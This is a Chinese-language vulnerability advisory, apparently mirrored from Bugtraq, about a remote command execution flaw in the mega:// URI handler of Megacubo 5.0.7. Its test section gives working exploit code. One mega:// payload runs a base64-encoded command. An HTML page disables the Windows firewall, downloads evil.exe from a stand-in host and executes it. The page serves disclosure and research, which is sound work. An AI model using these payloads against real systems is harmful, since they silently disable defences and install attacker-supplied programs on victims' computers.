Megacubo mega:// URI处理器远程命令执行漏洞
发布日期:2008-12-30
更新日期:2008-12-31
受影响系统:Megacubo Megacubo 5.0.7
描述:
BUGTRAQ ID:
33062
Megacubo是用PHP和Winbinder编写的IPTV应用程序。
Megacubo的mega:// uri处理器没有正确地验证通过play命令所传送的参数,如果远程攻击者提交了带有con(设备名称)参数的play命令的话,就可以绕过file_exists()检查将恶意参数拷贝到c:\DATASTORE.txt文件并执行。
<*来源:pyrokinesis (
pyro@nospam.it)
链接:
http://marc.info/?l=bugtraq&m=123065545127269&w=2
http://secunia.com/advisories/33326/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
mega://play|con.."a()".system(base64_decode('Y21kIC9jIHN0YXJ0IGNhbGM='))."/?");print(
<html>
<head>
<title>MegaCubo - download & Execute</title>
<meta http-equiv="Content-Type" content="text/html; ">
</head>
<body>
<script>
// url download & exec code evil
evil = '
http://www.example.com/evil.exe';
// disable firewall encode base_64
firewall = 'bmV0c2ggZmlyZXdhbGwgc2V0IG9wbW9kZSBtb2RlID0gZGlzYWJsZQ==';
shellcode = 'mega://play|con.."a()".system(base64_decode("'+firewall+'")).fputs(fopen("c:/Megacubo.exe","w"),file_get_contents("'+evil+'")).system("C:/Megacubo.exe")."/?");print(';
// shell code
window.location=shellcode;
</script>
</body>
</html>
建议:
厂商补丁:
Megacubo
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.megacubo.net/tv/浏览次数:2530
严重程度:0(网友投票)